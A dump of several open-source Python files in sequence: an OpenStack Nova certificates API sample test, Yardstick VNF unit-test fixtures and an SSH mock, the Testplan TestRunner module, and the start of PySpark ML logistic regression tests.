# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from nova.tests.functional.api_sample_tests import api_sample_base
CONF = cfg.CONF
CONF.import_opt('osapi_compute_extension',
'nova.api.openstack.compute.legacy_v2.extensions')
class CertificatesSamplesJsonTest(api_sample_base.ApiSampleTestBaseV3):
extension_name = "os-certificates"
def _get_flags(self):
f = super(CertificatesSamplesJsonTest, self)._get_flags()
f['osapi_compute_extension'] = CONF.osapi_compute_extension[:]
f['osapi_compute_extension'].append(
'nova.api.openstack.compute.contrib.certificates.Certificates')
return f
def test_create_certificates(self):
response = self._do_post('os-certificates',
'certificate-create-req', {})
subs = self._get_regexes()
self._verify_response('certificate-create-resp', subs, response, 200)
def test_get_root_certificate(self):
response = self._do_get('os-certificates/root')
subs = self._get_regexes()
self._verify_response('certificate-get-root-resp', subs, response, 200)
|
the-stack_0_25180
|
# Copyright (c) 2016-2019 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import multiprocessing
import os
import mock
import unittest
from yardstick.network_services.vnf_generic.vnf import base
from yardstick.ssh import SSH
from yardstick.tests.unit import base as ut_base
IP_PIPELINE_CFG_FILE_TPL = ("arp_route_tbl = ({port0_local_ip_hex},"
"{port0_netmask_hex},1,{port1_local_ip_hex}) "
"({port1_local_ip_hex},{port1_netmask_hex},0,"
"{port0_local_ip_hex})")
IP_PIPELINE_ND_CFG_FILE_TPL = """
nd_route_tbl = ({port1_dst_ip_hex6},"""
"""{port1_dst_netmask_hex6},1,{port1_dst_ip_hex6})"""
_LOCAL_OBJECT = object()
VNFD_0 = {
'short-name': 'VpeVnf',
'vdu': [
{
'routing_table': [
{
'network': '152.16.100.20',
'netmask': '255.255.255.0',
'gateway': '152.16.100.20',
'if': 'xe0'
},
{
'network': '152.16.40.20',
'netmask': '255.255.255.0',
'gateway': '152.16.40.20',
'if': 'xe1'
},
],
'description': 'VPE approximation using DPDK',
'name': 'vpevnf-baremetal',
'nd_route_tbl': [
{
'network': '0064:ff9b:0:0:0:0:9810:6414',
'netmask': '112',
'gateway': '0064:ff9b:0:0:0:0:9810:6414',
'if': 'xe0'
},
{
'network': '0064:ff9b:0:0:0:0:9810:2814',
'netmask': '112',
'gateway': '0064:ff9b:0:0:0:0:9810:2814',
'if': 'xe1'
},
],
'id': 'vpevnf-baremetal',
'external-interface': [
{
'virtual-interface': {
'dst_mac': '00:00:00:00:00:03',
'vpci': '0000:05:00.0',
'local_ip': '152.16.100.19',
'type': 'PCI-PASSTHROUGH',
'netmask': '255.255.255.0',
'dpdk_port_num': 0,
'bandwidth': '10 Gbps',
'dst_ip': '152.16.100.20',
'local_mac': '00:00:00:00:00:01'
},
'vnfd-connection-point-ref': 'xe0',
'name': 'xe0'
},
{
'virtual-interface': {
'dst_mac': '00:00:00:00:00:04',
'vpci': '0000:05:00.1',
'local_ip': '152.16.40.19',
'type': 'PCI-PASSTHROUGH',
'netmask': '255.255.255.0',
'dpdk_port_num': 1,
'bandwidth': '10 Gbps',
'dst_ip': '152.16.40.20',
'local_mac': '00:00:00:00:00:02'
},
'vnfd-connection-point-ref': 'xe1',
'name': 'xe1'
},
],
},
],
'description': 'Vpe approximation using DPDK',
'mgmt-interface': {
'vdu-id': 'vpevnf-baremetal',
'host': '1.1.1.1',
'password': 'r00t',
'user': 'root',
'ip': '1.1.1.1'
},
'benchmark': {
'kpi': [
'packets_in',
'packets_fwd',
'packets_dropped',
],
},
'connection-point': [
{
'type': 'VPORT',
'name': 'xe0',
},
{
'type': 'VPORT',
'name': 'xe1',
},
],
'id': 'VpeApproxVnf', 'name': 'VPEVnfSsh'
}
VNFD = {
'vnfd:vnfd-catalog': {
'vnfd': [
VNFD_0,
]
}
}
class FileAbsPath(object):
def __init__(self, module_file):
super(FileAbsPath, self).__init__()
self.module_path = os.path.dirname(os.path.abspath(module_file))
def get_path(self, filename):
file_path = os.path.join(self.module_path, filename)
return file_path
def mock_ssh(mock_ssh_type, spec=None, exec_result=_LOCAL_OBJECT, run_result=_LOCAL_OBJECT):
if spec is None:
spec = SSH
if exec_result is _LOCAL_OBJECT:
exec_result = 0, "", ""
if run_result is _LOCAL_OBJECT:
run_result = 0, "", ""
mock_ssh_instance = mock.Mock(autospec=spec)
mock_ssh_instance._get_client.return_value = mock.Mock()
mock_ssh_instance.execute.return_value = exec_result
mock_ssh_instance.run.return_value = run_result
mock_ssh_type.from_node.return_value = mock_ssh_instance
return mock_ssh_instance
class TestQueueFileWrapper(unittest.TestCase):
def setUp(self):
self.prompt = "pipeline>"
self.q_in = multiprocessing.Queue()
self.q_out = multiprocessing.Queue()
def test___init__(self):
queue_file_wrapper = \
base.QueueFileWrapper(self.q_in, self.q_out, self.prompt)
self.assertEqual(queue_file_wrapper.prompt, self.prompt)
def test_clear(self):
queue_file_wrapper = \
base.QueueFileWrapper(self.q_in, self.q_out, self.prompt)
queue_file_wrapper.bufsize = 5
queue_file_wrapper.write("pipeline>")
queue_file_wrapper.close()
self.assertIsNone(queue_file_wrapper.clear())
self.assertIsNotNone(queue_file_wrapper.q_out.empty())
def test_close(self):
queue_file_wrapper = \
base.QueueFileWrapper(self.q_in, self.q_out, self.prompt)
self.assertIsNone(queue_file_wrapper.close())
def test_read(self):
queue_file_wrapper = \
base.QueueFileWrapper(self.q_in, self.q_out, self.prompt)
queue_file_wrapper.q_in.put("pipeline>")
self.assertEqual("pipeline>", queue_file_wrapper.read(20))
def test_write(self):
queue_file_wrapper = \
base.QueueFileWrapper(self.q_in, self.q_out, self.prompt)
queue_file_wrapper.write("pipeline>")
self.assertIsNotNone(queue_file_wrapper.q_out.empty())
class TestGenericVNF(ut_base.BaseUnitTestCase):
def test_definition(self):
"""Make sure that the abstract class cannot be instantiated"""
with self.assertRaises(TypeError) as exc:
# pylint: disable=abstract-class-instantiated
base.GenericVNF('vnf1', VNFD['vnfd:vnfd-catalog']['vnfd'][0])
msg = ("Can't instantiate abstract class GenericVNF with abstract "
"methods collect_kpi, instantiate, scale, start_collect, "
"stop_collect, terminate, wait_for_instantiate")
self.assertEqual(msg, str(exc.exception))
class GenericTrafficGenTestCase(ut_base.BaseUnitTestCase):
def test_definition(self):
"""Make sure that the abstract class cannot be instantiated"""
vnfd = VNFD['vnfd:vnfd-catalog']['vnfd'][0]
name = 'vnf1'
with self.assertRaises(TypeError) as exc:
# pylint: disable=abstract-class-instantiated
base.GenericTrafficGen(name, vnfd)
msg = ("Can't instantiate abstract class GenericTrafficGen with "
"abstract methods collect_kpi, instantiate, run_traffic, "
"scale, terminate")
self.assertEqual(msg, str(exc.exception))
|
the-stack_0_25181
|
"""Tests runner module."""
import os
import random
import time
import datetime
import webbrowser
from collections import OrderedDict
import pytz
from schema import Or, And, Use
from testplan import defaults
from testplan.common.config import ConfigOption
from testplan.common.entity import (
RunnableConfig,
RunnableStatus,
RunnableResult,
Runnable,
)
from testplan.common.exporters import BaseExporter, ExporterResult
from testplan.common.report import MergeError
from testplan.common.utils import logger
from testplan.common.utils import strings
from testplan.common.utils.path import default_runpath
from testplan.exporters import testing as test_exporters
from testplan.report import (
TestReport,
TestGroupReport,
Status,
ReportCategories,
)
from testplan.report.testing.styles import Style
from testplan.runnable.interactive import TestRunnerIHandler
from testplan.runners.base import Executor
from testplan.runners.pools.tasks import Task, TaskResult
from testplan.testing import listing, filtering, ordering, tagging
from testplan.testing.base import TestResult
def get_exporters(values):
"""
Validation function for exporter declarations.
:param values: Single or a list of exporter declaration(s).
:return: List of initialized exporter objects.
"""
def get_exporter(value):
if isinstance(value, BaseExporter):
return value
elif isinstance(value, tuple):
exporter_cls, params = value
return exporter_cls(**params)
raise TypeError("Invalid exporter value: {}".format(value))
if values is None:
return []
elif isinstance(values, list):
return [get_exporter(v) for v in values]
return [get_exporter(values)]
def result_for_failed_task(original_result):
"""
Create a new result entry for invalid result retrieved from a resource.
"""
result = TestResult()
result.report = TestGroupReport(
name=original_result.task.name, category=ReportCategories.ERROR
)
attrs = [attr for attr in original_result.task.all_attrs]
result_lines = [
"{}: {}".format(attr, getattr(original_result.task, attr))
if getattr(original_result.task, attr, None)
else ""
for attr in attrs
]
result.report.logger.error(
os.linesep.join([line for line in result_lines if line])
)
result.report.logger.error(original_result.reason)
result.report.status_override = Status.ERROR
return result
class TestRunnerConfig(RunnableConfig):
"""
Configuration object for
:py:class:`~testplan.runnable.TestRunner` runnable object.
"""
ignore_extra_keys = True
@classmethod
def get_options(cls):
return {
"name": str,
ConfigOption("description", default=None): Or(str, None),
ConfigOption("logger_level", default=logger.TEST_INFO): int,
ConfigOption("file_log_level", default=logger.DEBUG): int,
ConfigOption("runpath", default=default_runpath): Or(
None, str, lambda x: callable(x)
),
ConfigOption("path_cleanup", default=True): bool,
ConfigOption("all_tasks_local", default=False): bool,
ConfigOption(
"shuffle", default=[]
): list, # list of string choices
ConfigOption(
"shuffle_seed", default=float(random.randint(1, 9999))
): float,
ConfigOption("exporters", default=None): Use(get_exporters),
ConfigOption("stdout_style", default=defaults.STDOUT_STYLE): Style,
ConfigOption("report_dir", default=defaults.REPORT_DIR): Or(
str, None
),
ConfigOption("xml_dir", default=None): Or(str, None),
ConfigOption("pdf_path", default=None): Or(str, None),
ConfigOption("json_path", default=None): Or(str, None),
ConfigOption("http_url", default=None): Or(str, None),
ConfigOption("pdf_style", default=defaults.PDF_STYLE): Style,
ConfigOption("report_tags", default=[]): [
Use(tagging.validate_tag_value)
],
ConfigOption("report_tags_all", default=[]): [
Use(tagging.validate_tag_value)
],
ConfigOption("merge_scheduled_parts", default=False): bool,
ConfigOption("browse", default=False): bool,
ConfigOption("ui_port", default=None): Or(None, int),
ConfigOption(
"web_server_startup_timeout",
default=defaults.WEB_SERVER_TIMEOUT,
): int,
ConfigOption(
"test_filter", default=filtering.Filter()
): filtering.BaseFilter,
ConfigOption(
"test_sorter", default=ordering.NoopSorter()
): ordering.BaseSorter,
# Test lister is None by default, otherwise Testplan would
# list tests, not run them
ConfigOption("test_lister", default=None): Or(
None, listing.BaseLister
),
ConfigOption("verbose", default=False): bool,
ConfigOption("debug", default=False): bool,
ConfigOption("timeout", default=defaults.TESTPLAN_TIMEOUT): Or(
None, And(int, lambda t: t >= 0)
),
ConfigOption("abort_wait_timeout", default=60): int,
ConfigOption(
"interactive_handler", default=TestRunnerIHandler
): object,
ConfigOption("extra_deps", default=[]): list,
ConfigOption("label", default=None): Or(None, str),
}
class TestRunnerStatus(RunnableStatus):
"""
Status of a
:py:class:`TestRunner <testplan.runnable.TestRunner>` runnable object.
"""
class TestRunnerResult(RunnableResult):
"""
Result object of a
:py:class:`TestRunner <testplan.runnable.TestRunner>` runnable object.
"""
def __init__(self):
super(TestRunnerResult, self).__init__()
self.test_results = OrderedDict()
self.exporter_results = []
self.test_report = None
@property
def report(self):
"""Tests report."""
return self.test_report
@property
def success(self):
"""Run was successful."""
return not self.test_report.failed and all(
[
exporter_result.success
for exporter_result in self.exporter_results
]
)
class TestRunner(Runnable):
r"""
Adds tests to test
:py:class:`executor <testplan.runners.base.Executor>` resources
and invoke report
:py:class:`exporter <testplan.exporters.testing.base.Exporter>` objects
to create the
:py:class:`~testplan.runnable.TestRunnerResult`.
:param name: Name of test runner.
:type name: ``str``
:param description: Description of test runner.
:type description: ``str``
:param logger_level: Logger level for stdout.
:type logger_level: ``int``
:param: file_log_level: Logger level for file.
:type file_log_level: ``int``
:param runpath: Input runpath.
:type runpath: ``str`` or ``callable``
:param path_cleanup: Clean previous runpath entries.
:type path_cleanup: ``bool``
:param all_tasks_local: Schedule all tasks in local pool
:type all_tasks_local: ``bool``
:param shuffle: Shuffle strategy.
:type shuffle: ``list`` of ``str``
:param shuffle_seed: Shuffle seed.
:type shuffle_seed: ``float``
:param exporters: Exporters for reports creation.
:type exporters: ``list``
:param stdout_style: Styling output options.
:type stdout_style:
:py:class:`Style <testplan.report.testing.styles.Style>`
:param report_dir: Report directory.
:type report_dir: ``str``
:param xml_dir: XML output directory.
:type xml_dir: ``str``
:param pdf_path: PDF output path <PATH>/\*.pdf.
:type pdf_path: ``str``
:param json_path: JSON output path <PATH>/\*.json.
:type json_path: ``str``
:param pdf_style: PDF creation styling options.
:type pdf_style: :py:class:`Style <testplan.report.testing.styles.Style>`
:param http_url: Web url for posting test report.
:type http_url: ``str``
:param report_tags: Matches tests marked with any of the given tags.
:type report_tags: ``list``
:param report_tags_all: Match tests marked with all of the given tags.
:type report_tags_all: ``list``
:param merge_scheduled_parts: Merge report of scheduled MultiTest parts.
:type merge_scheduled_parts: ``bool``
:param browse: Open web browser to display the test report.
:type browse: ``bool`` or ``NoneType``
:param ui_port: Port of web server for displaying test report.
:type ui_port: ``int`` or ``NoneType``
:param web_server_startup_timeout: Timeout for starting web server.
:type web_server_startup_timeout: ``int``
:param test_filter: Tests filtering class.
:type test_filter: Subclass of
:py:class:`BaseFilter <testplan.testing.filtering.BaseFilter>`
:param test_sorter: Tests sorting class.
:type test_sorter: Subclass of
:py:class:`BaseSorter <testplan.testing.ordering.BaseSorter>`
:param test_lister: Tests listing class.
:type test_lister: Subclass of
:py:class:`BaseLister <testplan.testing.listing.BaseLister>`
:param verbose: Enable or disable verbose mode.
:type verbose: ``bool``
:param debug: Enable or disable debug mode.
:type debug: ``bool``
:param timeout: Timeout value for test execution.
:type timeout: ``NoneType`` or ``int`` (greater than 0).
:param abort_wait_timeout: Timeout for test runner abort.
:type abort_wait_timeout: ``int``
:param interactive_handler: Handler for interactive mode execution.
:type interactive_handler: Subclass of :py:class:
`TestRunnerIHandler <testplan.runnable.interactive.TestRunnerIHandler>`
:param extra_deps: Extra module dependencies for interactive reload.
:type extra_deps: ``list`` of ``module``
Also inherits all
:py:class:`~testplan.common.entity.base.Runnable` options.
"""
CONFIG = TestRunnerConfig
STATUS = TestRunnerStatus
RESULT = TestRunnerResult
def __init__(self, **options):
super(TestRunner, self).__init__(**options)
self._tests = OrderedDict() # uid to resource, in definition order
self._part_instance_names = set() # name of Multitest part
self._result.test_report = TestReport(
name=self.cfg.name,
description=self.cfg.description,
uid=self.cfg.name,
timeout=self.cfg.timeout,
label=self.cfg.label,
)
self._exporters = None
self._web_server_thread = None
self._file_log_handler = None
self._configure_stdout_logger()
# Before saving test report, recursively generate unique strings in
# uuid4 format as report uid instead of original one. Skip this step
# when executing unit/functional tests or running in interactive mode.
self._reset_report_uid = self.cfg.interactive_port is None
@property
def report(self):
"""Tests report."""
return self._result.test_report
@property
def exporters(self):
"""
Return a list of
:py:class:`Resources <testplan.exporters.testing.base.Exporter>`.
"""
if self._exporters is None:
self._exporters = self.get_default_exporters()
if self.cfg.exporters:
self._exporters.extend(self.cfg.exporters)
for exporter in self._exporters:
if hasattr(exporter, "cfg"):
exporter.cfg.parent = self.cfg
exporter.parent = self
return self._exporters
def get_default_exporters(self):
"""
Instantiate certain exporters if related cmdline argument (e.g. --pdf)
or programmatic arguments (e.g. pdf_path) is passed but there are not
any exporter declarations.
"""
exporters = []
if self.cfg.pdf_path:
exporters.append(test_exporters.PDFExporter())
if self.cfg.report_tags or self.cfg.report_tags_all:
exporters.append(test_exporters.TagFilteredPDFExporter())
if self.cfg.json_path:
exporters.append(test_exporters.JSONExporter())
if self.cfg.xml_dir:
exporters.append(test_exporters.XMLExporter())
if self.cfg.http_url:
exporters.append(test_exporters.HTTPExporter())
if self.cfg.ui_port is not None:
exporters.append(
test_exporters.WebServerExporter(ui_port=self.cfg.ui_port)
)
return exporters
def add_environment(self, env, resource=None):
"""
Adds an environment to the target resource holder.
:param env: Environment creator instance.
:type env: Subclass of
:py:class:`~testplan.environment.EnvironmentCreator`
:param resource: Target environments holder resource.
:param resource: Subclass of
:py:class:`~testplan.environment.Environments`
:return: Environment uid.
:rtype: ``str``
"""
resource = (
self.resources[resource]
if resource
else self.resources.environments
)
target = env.create(parent=self)
env_uid = env.uid()
resource.add(target, env_uid)
return env_uid
def add_resource(self, resource, uid=None):
"""
Adds a test
:py:class:`executor <testplan.runners.base.Executor>`
resource in the test runner environment.
:param resource: Test executor to be added.
:type resource: Subclass of :py:class:`~testplan.runners.base.Executor`
:param uid: Optional input resource uid.
:type uid: ``str``
:return: Resource uid assigned.
:rtype: ``str``
"""
resource.parent = self
resource.cfg.parent = self.cfg
return self.resources.add(
resource, uid=uid or getattr(resource, "uid", strings.uuid4)()
)
def schedule(self, task=None, resource=None, **options):
"""
Schedules a serializable
:py:class:`~testplan.runners.pools.tasks.base.Task` in a task runner
:py:class:`~testplan.runners.pools.base.Pool` executor resource.
:param task: Input task.
:param task: :py:class:`~testplan.runners.pools.tasks.base.Task`
:param resource: Target pool resource.
:param resource: :py:class:`~testplan.runners.pools.base.Pool`
:param options: Task input options.
:param options: ``dict``
:return uid: Assigned uid for task.
:rtype: ``str``
"""
return self.add(task or Task(**options), resource=resource)
def add(self, target, resource=None):
"""
Adds a :py:class:`runnable <testplan.common.entity.base.Runnable>`
test entity, or a :py:class:`~testplan.runners.pools.tasks.base.Task`,
or a callable that returns a test entity to a
:py:class:`~testplan.runners.base.Executor` resource.
:param target: Test target.
:type target: :py:class:`~testplan.common.entity.base.Runnable` or
:py:class:`~testplan.runners.pools.tasks.base.Task` or ``callable``
:param resource: Test executor resource.
:type resource: :py:class:`~testplan.runners.base.Executor`
:return: Assigned uid for test.
:rtype: ``str`` or ```NoneType``
"""
local_runner = self.resources.first()
resource = resource or local_runner
if resource not in self.resources:
raise RuntimeError(
'Resource "{}" does not exist.'.format(resource)
)
# Get the real test entity and verify if it should be added
runnable = self._verify_test_target(target)
if not runnable:
return None
uid = runnable.uid()
part = getattr(getattr(runnable, "cfg", {"part": None}), "part", None)
# Uid of test entity MUST be unique, generally the uid of a test entity
# is the same as its name. When a test entity is split into multi-parts
# the uid will change (e.g. with a postfix), however its name should be
# different from uids of all non-part entities, and its uid cannot be
# the same as the name of any test entity.
if uid in self._tests:
raise ValueError(
'{} with uid "{}" already added.'.format(self._tests[uid], uid)
)
if uid in self._part_instance_names:
raise ValueError(
'Multitest part named "{}" already added.'.format(uid)
)
if part:
if runnable.name in self._tests:
raise ValueError(
'{} with uid "{}" already added.'.format(
self._tests[runnable.name], runnable.name
)
)
self._part_instance_names.add(runnable.name)
# When running interactively, add all real test entities into the local
# runner even if they were scheduled into a pool. It greatly simplifies
# the interactive runner if it only has to deal with the local runner.
if self.cfg.interactive_port is not None:
self._tests[uid] = local_runner
self.resources[local_runner].add(runnable, uid)
return uid
# Reset the task uid which will be used for test result transport in
# a pool executor, it makes logging or debugging easier.
if isinstance(target, Task):
target._uid = uid
# In batch mode the original target is added into executors, it can be:
# 1> A runnable object (generally a test entity or customized by user)
# 2> A callable that returns a runnable object
# 3> A task that wrapped a runnable object
self._tests[uid] = resource
self.resources[resource].add(target, uid)
return uid
def _verify_test_target(self, target):
"""
Determines if a test target should be added for execution.
Returns the real test entity if it should run, otherwise None.
"""
# The target added into TestRunner can be: 1> a real test entity
# 2> a task wraps a test entity 3> a callable returns a test entity
if isinstance(target, Runnable):
runnable = target
elif isinstance(target, Task):
runnable = target.materialize()
elif callable(target):
runnable = target()
else:
raise TypeError(
"Unrecognized test target of type {}".format(type(target))
)
if isinstance(runnable, Runnable):
runnable.parent = self
runnable.cfg.parent = self.cfg
if type(self.cfg.test_filter) is not filtering.Filter:
should_run = runnable.should_run()
self.logger.debug(
"Should run %s? %s",
runnable.name,
"Yes" if should_run else "No",
)
if not should_run:
return None
# "--list" option means always not executing tests
if self.cfg.test_lister is not None:
self.cfg.test_lister.log_test_info(runnable)
return None
return runnable
def _add_step(self, step, *args, **kwargs):
if self.cfg.test_lister is None:
super(TestRunner, self)._add_step(step, *args, **kwargs)
def _record_start(self):
self.report.timer.start("run")
def _record_end(self):
self.report.timer.end("run")
def make_runpath_dirs(self):
super(TestRunner, self).make_runpath_dirs()
self.logger.test_info("Testplan runpath: {}".format(self.runpath))
def pre_resource_steps(self):
"""Steps to be executed before resources started."""
# self._add_step(self._runpath_initialization)
self._add_step(self._record_start)
self._add_step(self.make_runpath_dirs)
self._add_step(self._configure_file_logger)
def main_batch_steps(self):
"""Steps to be executed while resources are running."""
self._add_step(self._wait_ongoing)
def post_resource_steps(self):
"""Steps to be executed after resources stopped."""
self._add_step(self._create_result)
self._add_step(self._log_test_status)
self._add_step(self._record_end) # needs to happen before export
self._add_step(self._invoke_exporters)
self._add_step(self._post_exporters)
self._add_step(self._close_file_logger)
def _wait_ongoing(self):
# TODO: if a pool fails to initialize we could reschedule the tasks.
if self.resources.start_exceptions:
for resource, exception in self.resources.start_exceptions.items():
self.logger.critical(
"Aborting {} due to start exception:".format(resource)
)
self.logger.error(exception)
resource.abort()
_start_ts = (
self.result.test_report.timer["run"][0]
- datetime.datetime(1970, 1, 1, tzinfo=pytz.utc)
).total_seconds()
while self.active:
if self.cfg.timeout and time.time() - _start_ts > self.cfg.timeout:
self.result.test_report.logger.error(
"Timeout: Aborting execution after {} seconds".format(
self.cfg.timeout
)
)
# Abort dependencies, wait sometime till test reports are ready
for dep in self.abort_dependencies():
self._abort_entity(dep)
time.sleep(self.cfg.abort_wait_timeout)
break
pending_work = False
for resource in self.resources:
# Check if any resource has pending work.
# Maybe print periodically the pending work of resource.
pending_work = resource.pending_work() or pending_work
# Poll the resource's health - if it has unexpectedly died
# then abort the entire test to avoid hanging.
if not resource.is_alive:
self.result.test_report.logger.critical(
"Aborting {} - {} unexpectedly died".format(
self, resource
)
)
self.abort()
self.result.test_report.status_override = Status.ERROR
if pending_work is False:
break
time.sleep(self.cfg.active_loop_sleep)
def _create_result(self):
"""Fetch task result from executors and create a full test result."""
step_result = True
test_results = self._result.test_results
test_report = self._result.test_report
test_rep_lookup = {}
for uid, resource in self._tests.items():
if not isinstance(self.resources[resource], Executor):
continue
resource_result = self.resources[resource].results.get(uid)
# Tasks may not been executed (i.e. timeout), although the thread
# will wait for a buffer period until the follow up work finishes.
# But for insurance we assume that still some uids are missing.
if not resource_result:
continue
elif isinstance(resource_result, TaskResult):
if resource_result.status is False:
test_results[uid] = result_for_failed_task(resource_result)
else:
test_results[uid] = resource_result.result
else:
test_results[uid] = resource_result
run, report = test_results[uid].run, test_results[uid].report
if report.part:
if self.cfg.merge_scheduled_parts:
report.uid = report.name
# Save the report temporarily and later will merge it
test_rep_lookup.setdefault(report.uid, []).append(
(test_results[uid].run, report)
)
if report.uid not in test_report.entry_uids:
# Create a placeholder for merging sibling reports
if isinstance(resource_result, TaskResult):
# `runnable` must be an instance of MultiTest since
# the corresponding report has `part` defined. Can
# get a full structured report by `dry_run` and the
# order of testsuites/testcases can be retained.
runnable = resource_result.task.materialize()
runnable.parent = self
runnable.cfg.parent = self.cfg
runnable.cfg._options["part"] = None
runnable._test_context = None
report = runnable.dry_run().report
else:
report = report.__class__(
report.name,
uid=report.uid,
category=report.category,
)
else:
continue # Wait all sibling reports collected
else:
# If do not want to merge sibling reports, then display
# them with different names. (e.g. `MTest - part(0/3)`)
report.name = report.uid
test_report.append(report)
step_result = step_result and run is True # boolean or exception
step_result = self._merge_reports(test_rep_lookup) and step_result
# Reset UIDs of the test report and all of its children in UUID4 format
if self._reset_report_uid:
test_report.reset_uid()
return step_result
def _merge_reports(self, test_report_lookup):
"""
Merge report of MultiTest parts into test runner report.
Return True if all parts are found and can be successfully merged.
Format of test_report_lookup:
{
'report_uid_1': [
(True, report_1_part_1), (True, report_1_part_2), ...
],
'report_uid_2': [
(True, report_2_part_1), (False, report_2_part_2), ...
],
...
}
"""
merge_result = True
for uid, result in test_report_lookup.items():
placeholder_report = self._result.test_report.get_by_uid(uid)
num_of_parts = 0
part_indexes = set()
merged = False
with placeholder_report.logged_exceptions():
for run, report in result:
if num_of_parts and num_of_parts != report.part[1]:
raise ValueError(
"Cannot merge parts for child report with"
" `uid`: {uid}, invalid parameter of part"
" provided.".format(uid=uid)
)
elif report.part[0] in part_indexes:
raise ValueError(
"Cannot merge parts for child report with"
" `uid`: {uid}, duplicate MultiTest parts"
" had been scheduled.".format(uid=uid)
)
else:
part_indexes.add(report.part[0])
num_of_parts = report.part[1]
if run:
if isinstance(run, Exception):
raise run
else:
placeholder_report.merge(report, strict=False)
else:
raise MergeError(
"Cannot merge parts for child report with"
" `uid`: {uid}, at least one part (index:{part})"
" didn't run.".format(uid=uid, part=report.part[0])
)
else:
if len(part_indexes) < num_of_parts:
raise MergeError(
"Cannot merge parts for child report with"
" `uid`: {uid}, not all MultiTest parts"
" had been scheduled.".format(uid=uid)
)
merged = True
# If fail to merge sibling reports, clear the placeholder report
# but keep error logs, sibling reports will be appended at the end.
if not merged:
placeholder_report.entries = []
placeholder_report._index = {}
placeholder_report.status_override = Status.ERROR
for _, report in result:
report.name = "{} - part({}/{})".format(
report.name, report.part[0], report.part[1]
)
report.uid = strings.uuid4() # considered as error report
self._result.test_report.append(report)
merge_result = (
merge_result and placeholder_report.status != Status.ERROR
)
return merge_result
def uid(self):
"""Entity uid."""
return self.cfg.name
def _log_test_status(self):
if not self._result.test_report.entries:
self.logger.warning(
"No tests were run - check your filter patterns."
)
self._result.test_report.status_override = Status.FAILED
else:
self.logger.log_test_status(
self.cfg.name, self._result.test_report.status
)
def _invoke_exporters(self):
# Add this logic into a ReportExporter(Runnable)
# that will return a result containing errors
if hasattr(self._result.test_report, "bubble_up_attachments"):
self._result.test_report.bubble_up_attachments()
for exporter in self.exporters:
if isinstance(exporter, test_exporters.Exporter):
exp_result = ExporterResult.run_exporter(
exporter=exporter,
source=self._result.test_report,
type="test",
)
if not exp_result.success:
logger.TESTPLAN_LOGGER.error(exp_result.traceback)
self._result.exporter_results.append(exp_result)
else:
raise NotImplementedError(
"Exporter logic not implemented for: {}".format(
type(exporter)
)
)
def _post_exporters(self):
# View report in web browser if "--browse" specified
report_urls = []
report_opened = False
for result in self._result.exporter_results:
exporter = result.exporter
if getattr(exporter, "report_url", None) and self.cfg.browse:
report_urls.append(exporter.report_url)
if getattr(exporter, "_web_server_thread", None):
# Give priority to open report from local server
webbrowser.open(exporter.report_url)
report_opened = True
# Stuck here waiting for web server to terminate
self._web_server_thread = exporter._web_server_thread
self._web_server_thread.join()
if self.cfg.browse and not report_opened:
if len(report_urls) > 0:
for report_url in report_urls:
webbrowser.open(report_url)
else:
self.logger.warning(
"No reports opened, could not find "
"an exported result to browse"
)
def aborting(self):
"""Stop the web server if it is running."""
if self._web_server_thread is not None:
self._web_server_thread.stop()
self._close_file_logger()
def _configure_stdout_logger(self):
"""Configure the stdout logger by setting the required level."""
logger.STDOUT_HANDLER.setLevel(self.cfg.logger_level)
def _configure_file_logger(self):
"""
Configure the file logger to the specified log levels. A log file
will be created under the runpath (so runpath must be created before
this method is called).
"""
if self.runpath is None:
raise RuntimeError(
"Need to set up runpath before configuring logger"
)
if self.cfg.file_log_level is None:
self.logger.debug("Not enabling file logging")
else:
self._file_log_handler = logger.configure_file_logger(
self.cfg.file_log_level, self.runpath
)
def _close_file_logger(self):
"""
Closes the file logger, releasing all file handles. This is necessary to
avoid permissions errors on Windows.
"""
if self._file_log_handler is not None:
self._file_log_handler.flush()
self._file_log_handler.close()
logger.TESTPLAN_LOGGER.removeHandler(self._file_log_handler)
self._file_log_handler = None
|
the-stack_0_25183
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from shutil import rmtree
import sys
import tempfile
if sys.version_info[:2] <= (2, 6):
try:
import unittest2 as unittest
except ImportError:
sys.stderr.write('Please install unittest2 to test with Python 2.6 or earlier')
sys.exit(1)
else:
import unittest
import numpy as np
from pyspark.ml.classification import DecisionTreeClassifier, LogisticRegression, \
MultilayerPerceptronClassifier, OneVsRest
from pyspark.ml.clustering import DistributedLDAModel, KMeans, LocalLDAModel, LDA, LDAModel
from pyspark.ml.fpm import FPGrowth
from pyspark.ml.linalg import Matrices, Vectors
from pyspark.ml.recommendation import ALS
from pyspark.ml.regression import GeneralizedLinearRegression, LinearRegression
from pyspark.sql import Row
from pyspark.testing.mlutils import SparkSessionTestCase
class LogisticRegressionTest(SparkSessionTestCase):
def test_binomial_logistic_regression_with_bound(self):
df = self.spark.createDataFrame(
[(1.0, 1.0, Vectors.dense(0.0, 5.0)),
(0.0, 2.0, Vectors.dense(1.0, 2.0)),
(1.0, 3.0, Vectors.dense(2.0, 1.0)),
(0.0, 4.0, Vectors.dense(3.0, 3.0)), ], ["label", "weight", "features"])
lor = LogisticRegression(regParam=0.01, weightCol="weight",
lowerBoundsOnCoefficients=Matrices.dense(1, 2, [-1.0, -1.0]),
upperBoundsOnIntercepts=Vectors.dense(0.0))
model = lor.fit(df)
self.assertTrue(
np.allclose(model.coefficients.toArray(), [-0.2944, -0.0484], atol=1E-4))
self.assertTrue(np.isclose(model.intercept, 0.0, atol=1E-4))
def test_multinomial_logistic_regression_with_bound(self):
